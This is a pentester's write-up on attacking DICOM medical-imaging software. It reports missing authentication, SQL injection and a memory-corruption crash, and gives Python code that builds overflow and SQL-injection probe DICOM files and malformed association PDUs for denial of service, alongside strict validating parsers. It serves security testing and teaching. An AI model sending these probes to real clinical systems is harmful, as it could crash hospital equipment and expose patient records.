Attacking DICOM

Quick notes from attacking DICOM on a short engagement.

  • DICOM defines standards for storing, transmitting, compressing and presenting medical images.
  • E.g. a CT scanner sending scanned images to a doctor's workstation uses the DICOM file format (and its compression transfer syntaxes) to encode the images and the DICOM network protocol to transmit them.
  • From a pentesting point of view, there are a few attack surfaces:
    • DICOM file parser (Part 10 files: preamble, file meta information, data elements with attacker-controlled lengths)
    • DICOM protocol parser (association PDUs and DIMSE messages arriving on the listening port)
    • DICOM application layer injection attacks (attacker-controlled fields such as patient name or patient ID reaching a database, file path or UI)
  • The thick client application was supposed to be installed on all desktops, listening on a specific port for incoming images. There was no authentication in place. Even though DICOM supports SSL, the application sent everything in plaintext. All the patient data was stored unencrypted, without using Microsoft DPAPI.
  • Defensics has a DICOM module that can be used to fuzz the protocol parser. Because of a DoS vulnerability, it was not possible to fuzz the application using Defensics; DoS was the only outcome of this effort. Additional investigation and time would have been necessary to figure out the source of the DoS vulnerability and fix it before continuous fuzzing.
  • Used the following GUI tool to generate and send DICOM images: https://www.dcmsys.com/interoperability/dicom-image-generator/
  • It appeared to be easy to use for testing application layer injection attacks, simple buffer overflows etc. For sending custom binary payloads, I had to use the GDCM utilities: https://github.com/malaterre/GDCM/releases. There are also the pydicom and pynetdicom Python libraries if you would like more fine-grained control.

  • The application had a local database with patient data in it. Quickly scanning the binary for SQL statements revealed that SQL injection might be possible, which was later confirmed using the DICOM Image Generator.
  • Attacked the file parser for memory corruption by inserting a large blob in the patient name. It almost immediately crashed with an error.
  • EIP did not seem to be under control, but after massaging the stack I did manage to pop a calc on Windows 10.
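The two payloads above (a large blob in the patient name, a quoted patient ID for the SQL injection) can be produced without any GUI tool. The following is an added example, not code from the original notes or from the DICOM Image Generator or GDCM: it writes a minimal DICOM Part 10 file with the Python standard library only, using Implicit VR Little Endian for the dataset so that every element carries a 4-byte length and the patient name can exceed the 65535-byte limit of 2-byte explicit VR lengths. The UIDs marked as placeholders and the probe values are assumptions made for the example. The small parser at the end is the check a receiving application should make: a declared element length is never trusted beyond the bytes actually present.

```python
"""Build a DICOM Part 10 file whose patient fields carry test payloads (added example,
standard library only; placeholder UIDs are made up for this example)."""
import struct

EXPLICIT_VR_LE = "1.2.840.10008.1.2.1"
IMPLICIT_VR_LE = "1.2.840.10008.1.2"
SECONDARY_CAPTURE = "1.2.840.10008.5.1.4.1.1.7"   # Secondary Capture Image Storage
IMPL_CLASS_UID = "1.2.3.4.5.6.7"                  # placeholder, not a registered UID
SOP_INSTANCE_UID = "1.2.3.4.5.6.7.8.9"            # placeholder, not a registered UID
LONG_VR = ("OB", "OW", "OF", "SQ", "UT", "UN")     # explicit VRs that use a 4-byte length


def _pad(value: bytes, pad: bytes) -> bytes:
    """DICOM values must have even length: UI/OB pad with NUL, text VRs with space."""
    return value + pad if len(value) % 2 else value


def explicit_element(group: int, elem: int, vr: str, value: bytes) -> bytes:
    """Explicit VR Little Endian element (the file meta information group always uses it)."""
    value = _pad(value, b"\x00" if vr in ("UI",) + LONG_VR else b" ")
    if vr in LONG_VR:
        return struct.pack("<HH2sxxI", group, elem, vr.encode(), len(value)) + value
    return struct.pack("<HH2sH", group, elem, vr.encode(), len(value)) + value


def implicit_element(group: int, elem: int, value: bytes, pad: bytes = b" ") -> bytes:
    """Implicit VR Little Endian element: always a 4-byte length, so values may exceed 64 KiB."""
    value = _pad(value, pad)
    return struct.pack("<HHI", group, elem, len(value)) + value


def build_dicom(patient_name: bytes, patient_id: bytes) -> bytes:
    """128-byte preamble, 'DICM', file meta group, then a 2x2 8-bit grayscale dataset."""
    meta_body = (
        explicit_element(0x0002, 0x0001, "OB", b"\x00\x01")               # meta version
        + explicit_element(0x0002, 0x0002, "UI", SECONDARY_CAPTURE.encode())
        + explicit_element(0x0002, 0x0003, "UI", SOP_INSTANCE_UID.encode())
        + explicit_element(0x0002, 0x0010, "UI", IMPLICIT_VR_LE.encode())  # dataset syntax
        + explicit_element(0x0002, 0x0012, "UI", IMPL_CLASS_UID.encode())
    )
    meta = explicit_element(0x0002, 0x0000, "UL", struct.pack("<I", len(meta_body))) + meta_body
    us = lambda v: struct.pack("<H", v)
    dataset = (
        implicit_element(0x0008, 0x0016, SECONDARY_CAPTURE.encode(), b"\x00")  # SOPClassUID
        + implicit_element(0x0008, 0x0018, SOP_INSTANCE_UID.encode(), b"\x00")  # SOPInstanceUID
        + implicit_element(0x0010, 0x0010, patient_name)                   # PatientName (PN)
        + implicit_element(0x0010, 0x0020, patient_id)                     # PatientID (LO)
        + implicit_element(0x0028, 0x0002, us(1))                          # SamplesPerPixel
        + implicit_element(0x0028, 0x0004, b"MONOCHROME2")                 # PhotometricInterpretation
        + implicit_element(0x0028, 0x0010, us(2))                          # Rows
        + implicit_element(0x0028, 0x0011, us(2))                          # Columns
        + implicit_element(0x0028, 0x0100, us(8))                          # BitsAllocated
        + implicit_element(0x0028, 0x0101, us(8))                          # BitsStored
        + implicit_element(0x0028, 0x0102, us(7))                          # HighBit
        + implicit_element(0x0028, 0x0103, us(0))                          # PixelRepresentation
        + implicit_element(0x7FE0, 0x0010, bytes([0, 85, 170, 255]), b"\x00")  # PixelData
    )
    return b"\x00" * 128 + b"DICM" + meta + dataset


def overflow_probe(size: int = 1 << 20) -> bytes:
    """Patient name far beyond the 64-character PN limit (1 MiB of 'A' by default)."""
    return build_dicom(b"A" * size, b"PID-0001")


def sqli_probe() -> bytes:
    """Quoted patient ID: a receiver that concatenates it into SQL will error or obey it."""
    return build_dicom(b"DOE^JOHN", b"' OR '1'='1")


def parse_dicom(data: bytes) -> dict:
    """Walk the file: explicit VR for group 0002, then the syntax announced in (0002,0010).
    Every declared length is checked against the bytes present before it is used."""
    if data[128:132] != b"DICM":
        raise ValueError("missing DICM magic")
    pos, elems, in_meta, explicit = 132, {}, True, True
    while pos < len(data):
        group, elem = struct.unpack_from("<HH", data, pos)
        if in_meta and group != 0x0002:
            in_meta = False
            explicit = elems[(0x0002, 0x0010)].rstrip(b"\x00") == EXPLICIT_VR_LE.encode()
        if explicit:
            vr = data[pos + 4:pos + 6].decode()
            if vr in LONG_VR:
                (length,), hdr = struct.unpack_from("<I", data, pos + 8), 12
            else:
                (length,), hdr = struct.unpack_from("<H", data, pos + 6), 8
        else:
            (length,), hdr = struct.unpack_from("<I", data, pos + 4), 8
        if length == 0xFFFFFFFF or pos + hdr + length > len(data):
            raise ValueError(f"bad length {length:#x} at ({group:04X},{elem:04X})")
        elems[(group, elem)] = data[pos + hdr:pos + hdr + length]
        pos += hdr + length
    return elems


def parses_cleanly(data: bytes) -> bool:
    """True if the strict parser accepts the file without a length violation."""
    try:
        parse_dicom(data)
        return True
    except (ValueError, struct.error, KeyError):
        return False


if __name__ == "__main__":
    open("overflow.dcm", "wb").write(overflow_probe())
    open("sqli.dcm", "wb").write(sqli_probe())
```

Writing the two files and sending them with a C-STORE client (GDCM's gdcmscu or pynetdicom) exercises the receiver's file parser and, via the patient ID, whatever SQL it builds from the header; the strict parser above is what the receiver should have done with the 1 MiB PatientName instead of crashing.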
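On the protocol-parser side, the Defensics run above stalled on a DoS. The following added example (not from the original notes and not Defensics) shows what a hand-rolled seed for that surface looks like: it builds the A-ASSOCIATE-RQ PDU that opens every DICOM association, applies two length-field lies of the kind that typically trigger such DoS conditions, and includes a strict parser that rejects them. AE titles and the implementation class UID are placeholders chosen for the example.

```python
"""A-ASSOCIATE-RQ builder, length-field mutations and a strict parser (added example,
standard library only; AE titles and the implementation UID are placeholders)."""
import struct

APP_CONTEXT = "1.2.840.10008.3.1.1.1"      # DICOM Application Context Name
VERIFICATION_SOP = "1.2.840.10008.1.1"     # Verification SOP Class (C-ECHO)
IMPLICIT_VR_LE = "1.2.840.10008.1.2"
IMPL_CLASS_UID = "1.2.3.4.5.6.7"           # placeholder, not a registered UID
PDU_HEADER = 6                             # type, reserved, 4-byte big-endian length
FIXED_FIELDS = 2 + 2 + 16 + 16 + 32        # version, reserved, called AE, calling AE, reserved


def item(item_type: int, body: bytes) -> bytes:
    """Generic association item: type, reserved byte, 2-byte big-endian length, body."""
    return struct.pack(">BBH", item_type, 0, len(body)) + body


def ae_title(name: str) -> bytes:
    """AE titles are exactly 16 bytes, space padded (truncated here if longer)."""
    return name.encode("ascii")[:16].ljust(16, b" ")


def build_associate_rq(called: str, calling: str, max_pdu: int = 16384) -> bytes:
    """Well-formed request proposing C-ECHO over Implicit VR LE in presentation context 1."""
    pres_ctx = item(0x20, bytes([1, 0, 0, 0])               # context ID 1 + 3 reserved
                    + item(0x30, VERIFICATION_SOP.encode())  # abstract syntax
                    + item(0x40, IMPLICIT_VR_LE.encode()))   # transfer syntax
    user_info = item(0x50, item(0x51, struct.pack(">I", max_pdu))   # max PDU length we accept
                     + item(0x52, IMPL_CLASS_UID.encode()))
    body = (struct.pack(">HH", 1, 0) + ae_title(called) + ae_title(calling) + b"\x00" * 32
            + item(0x10, APP_CONTEXT.encode()) + pres_ctx + user_info)
    return struct.pack(">BBI", 0x01, 0, len(body)) + body


def mutate_pdu_length(pdu: bytes, declared: int) -> bytes:
    """Keep the bytes, lie about the PDU length (over-read / allocation DoS seed)."""
    return pdu[:2] + struct.pack(">I", declared) + pdu[6:]


def mutate_first_item_length(pdu: bytes, declared: int) -> bytes:
    """Overstate the Application Context item length so it overruns the PDU."""
    off = PDU_HEADER + FIXED_FIELDS + 2       # the item's 2-byte length field
    return pdu[:off] + struct.pack(">H", declared) + pdu[off + 2:]


def parse_associate_rq(pdu: bytes) -> dict:
    """Strict parser: every declared length must fit inside what was actually received."""
    if len(pdu) < PDU_HEADER or pdu[0] != 0x01:
        raise ValueError("not an A-ASSOCIATE-RQ")
    (pdu_len,) = struct.unpack_from(">I", pdu, 2)
    if PDU_HEADER + pdu_len != len(pdu):
        raise ValueError(f"PDU length {pdu_len} != {len(pdu) - PDU_HEADER} bytes received")
    if pdu_len < FIXED_FIELDS:
        raise ValueError("PDU too short for the fixed fields")
    info = {"called": pdu[10:26].rstrip(b" ").decode(),
            "calling": pdu[26:42].rstrip(b" ").decode(), "items": []}
    pos, end = PDU_HEADER + FIXED_FIELDS, PDU_HEADER + pdu_len
    while pos < end:
        if end - pos < 4:
            raise ValueError("truncated item header")
        item_type, _, length = struct.unpack_from(">BBH", pdu, pos)
        if pos + 4 + length > end:
            raise ValueError(f"item {item_type:#04x} length {length} overruns the PDU")
        info["items"].append((item_type, pdu[pos + 4:pos + 4 + length]))
        pos += 4 + length
    return info


def accepted(pdu: bytes) -> bool:
    """True if the strict parser accepts the PDU."""
    try:
        parse_associate_rq(pdu)
        return True
    except (ValueError, struct.error):
        return False
```

Each mutated PDU is a single `sock.sendall()` to the listening port; a receiver that allocates or reads according to the declared length rather than the received bytes is exactly the kind of target that only ever yields a DoS under a fuzzer, which matches the outcome described above.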